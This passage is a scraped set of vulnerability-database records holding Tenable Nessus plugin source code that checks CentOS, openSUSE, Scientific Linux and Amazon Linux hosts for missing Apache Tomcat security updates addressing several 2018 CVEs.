"p-cpe:/a:centos:centos:tomcat-jsvc", "p-cpe:/a:centos:centos:tomcat-lib", "p-cpe:/a:centos:centos:tomcat-servlet-3.0-api", "p-cpe:/a:centos:centos:tomcat-webapps", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2019-2205.NASL", "href": "https://www.tenable.com/plugins/nessus/128376", 
"sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:2205 and \n# CentOS Errata and Security Advisory 2019:2205 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128376);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/12/31\");\n\n script_cve_id(\"CVE-2018-1304\", \"CVE-2018-1305\", \"CVE-2018-8014\", \"CVE-2018-8034\");\n script_xref(name:\"RHSA\", value:\"2019:2205\");\n\n script_name(english:\"CentOS 7 : tomcat (CESA-2019:2205)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* tomcat: Incorrect handling of empty string URL in security\nconstraints can lead to unintended exposure of resources\n(CVE-2018-1304)\n\n* tomcat: Late application of security constraints can lead to\nresource exposure for unauthorised users (CVE-2018-1305)\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Host name verification missing in WebSocket client\n(CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.7 Release Notes linked from the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2019-August/006157.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aa51c586\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-admin-webapps-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-docs-webapp-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-el-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-javadoc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-jsp-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-jsvc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-lib-7.0.76-9.el7\")) flag++;\nif 
(rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-servlet-3.0-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tomcat-webapps-7.0.76-9.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:37", "description": "This update for tomcat to 8.0.53 fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the UTF-8 decoder with supplementary characters could have lead to an infinite loop in the decoder causing a Denial of Service (bsc#1102400).\n\n - CVE-2018-8034: The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could have resulted in a user seeing a response intended for a different user. 
An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also have resulted in a user seeing a response intended for another user (bsc#1102410).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings (bsc#1093697).\n\nBug fixes :\n\n - bsc#1067720: Avoid overwriting of customer's configuration during update.\n\n - bsc#1095472: Add Obsoletes for tomcat6 packages.\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {}, "published": "2018-09-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : tomcat (openSUSE-2018-1019)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat", "p-cpe:/a:novell:opensuse:tomcat-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat-docs-webapp", "p-cpe:/a:novell:opensuse:tomcat-el-3_0-api", "p-cpe:/a:novell:opensuse:tomcat-embed", "p-cpe:/a:novell:opensuse:tomcat-javadoc", "p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api", "p-cpe:/a:novell:opensuse:tomcat-jsvc", "p-cpe:/a:novell:opensuse:tomcat-lib", "p-cpe:/a:novell:opensuse:tomcat-servlet-3_1-api", "p-cpe:/a:novell:opensuse:tomcat-webapps", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-1019.NASL", "href": "https://www.tenable.com/plugins/nessus/117526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1019.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117526);\n script_version(\"1.3\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n\n script_name(english:\"openSUSE Security Update : tomcat (openSUSE-2018-1019)\");\n script_summary(english:\"Check for the openSUSE-2018-1019 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for tomcat to 8.0.53 fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the\n UTF-8 decoder with supplementary characters could have\n lead to an infinite loop in the decoder causing a Denial\n of Service (bsc#1102400).\n\n - CVE-2018-8034: The host name verification when using TLS\n with the WebSocket client was missing. It is now enabled\n by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the\n application at the same time as the container triggered\n the async timeout, a race condition existed that could\n have resulted in a user seeing a response intended for a\n different user. An additional issue was present in the\n NIO and NIO2 connectors that did not correctly track the\n closure of the connection when an async request was\n completed by the application and timed out by the\n container at the same time. 
This could also have\n resulted in a user seeing a response intended for\n another user (bsc#1102410).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings\n (bsc#1093697).\n\nBug fixes :\n\n - bsc#1067720: Avoid overwriting of customer's\n configuration during update.\n\n - bsc#1095472: Add Obsoletes for tomcat6 packages.\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1067720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1093697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-el-3_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-embed\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-servlet-3_1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-admin-webapps-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-docs-webapp-8.0.53-15.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.3\", reference:\"tomcat-el-3_0-api-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-embed-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-javadoc-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-jsp-2_3-api-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-jsvc-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-lib-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-servlet-3_1-api-8.0.53-15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"tomcat-webapps-8.0.53-15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:46", "description": "Security Fix(es) :\n\n - tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304)\n\n - tomcat: Late application of security constraints can lead to resource exposure for unauthorised users (CVE-2018-1305)\n\n - tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n - tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)", "cvss3": {}, "published": "2019-08-27T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : tomcat on SL7.x x86_64 (20190806)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2020-02-24T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:tomcat", 
"p-cpe:/a:fermilab:scientific_linux:tomcat-admin-webapps", "p-cpe:/a:fermilab:scientific_linux:tomcat-docs-webapp", "p-cpe:/a:fermilab:scientific_linux:tomcat-el-2.2-api", "p-cpe:/a:fermilab:scientific_linux:tomcat-javadoc", "p-cpe:/a:fermilab:scientific_linux:tomcat-jsp-2.2-api", "p-cpe:/a:fermilab:scientific_linux:tomcat-jsvc", "p-cpe:/a:fermilab:scientific_linux:tomcat-lib", "p-cpe:/a:fermilab:scientific_linux:tomcat-servlet-3.0-api", "p-cpe:/a:fermilab:scientific_linux:tomcat-webapps", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20190806_TOMCAT_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/128266", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128266);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-1304\", \"CVE-2018-1305\", \"CVE-2018-8014\", \"CVE-2018-8034\");\n\n script_name(english:\"Scientific Linux Security Update : tomcat on SL7.x x86_64 (20190806)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - tomcat: Incorrect handling of empty string URL in\n security constraints can lead to unintended exposure of\n resources (CVE-2018-1304)\n\n - tomcat: Late application of security constraints can\n lead to resource exposure for unauthorised users\n (CVE-2018-1305)\n\n - tomcat: Insecure defaults in CORS filter enable\n 'supportsCredentials' for all origins (CVE-2018-8014)\n\n - tomcat: Host name verification missing in WebSocket\n client (CVE-2018-8034)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1908&L=SCIENTIFIC-LINUX-ERRATA&P=24724\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2aa9ccdd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/06\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-admin-webapps-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-admin-webapps-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-docs-webapp-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-docs-webapp-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-el-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-el-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-javadoc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-javadoc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-jsp-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-jsp-2.2-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-jsvc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-jsvc-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-lib-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-lib-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-servlet-3.0-api-7.0.76-9.el7\")) flag++;\nif 
(rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-servlet-3.0-api-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"tomcat-webapps-7.0.76-9.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tomcat-webapps-7.0.76-9.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:04", "description": "The defaults settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\n\nAn improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 8.5.0 to 8.5.30. (CVE-2018-1336)\n\nThe host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 8.5.0 to 8.5.31.(CVE-2018-8034)\n\nA bug in the tracking of connection closures can lead to reuse of user sessions in a new connection. 
Versions Affected: Apache Tomcat 8.5.5 to 8.5.31.(CVE-2018-8037)", "cvss3": {}, "published": "2018-08-10T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat8 (ALAS-2018-1056)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2018-08-31T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat8", "p-cpe:/a:amazon:linux:tomcat8-admin-webapps", "p-cpe:/a:amazon:linux:tomcat8-docs-webapp", "p-cpe:/a:amazon:linux:tomcat8-el-3.0-api", "p-cpe:/a:amazon:linux:tomcat8-javadoc", "p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api", "p-cpe:/a:amazon:linux:tomcat8-lib", "p-cpe:/a:amazon:linux:tomcat8-log4j", "p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api", "p-cpe:/a:amazon:linux:tomcat8-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2018-1056.NASL", "href": "https://www.tenable.com/plugins/nessus/111611", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-1056.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111611);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/08/31 12:25:01\");\n\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_xref(name:\"ALAS\", value:\"2018-1056\");\n\n script_name(english:\"Amazon Linux AMI : tomcat8 (ALAS-2018-1056)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The defaults settings for the CORS filter provided in Apache Tomcat\nare insecure and enable 'supportsCredentials' for all 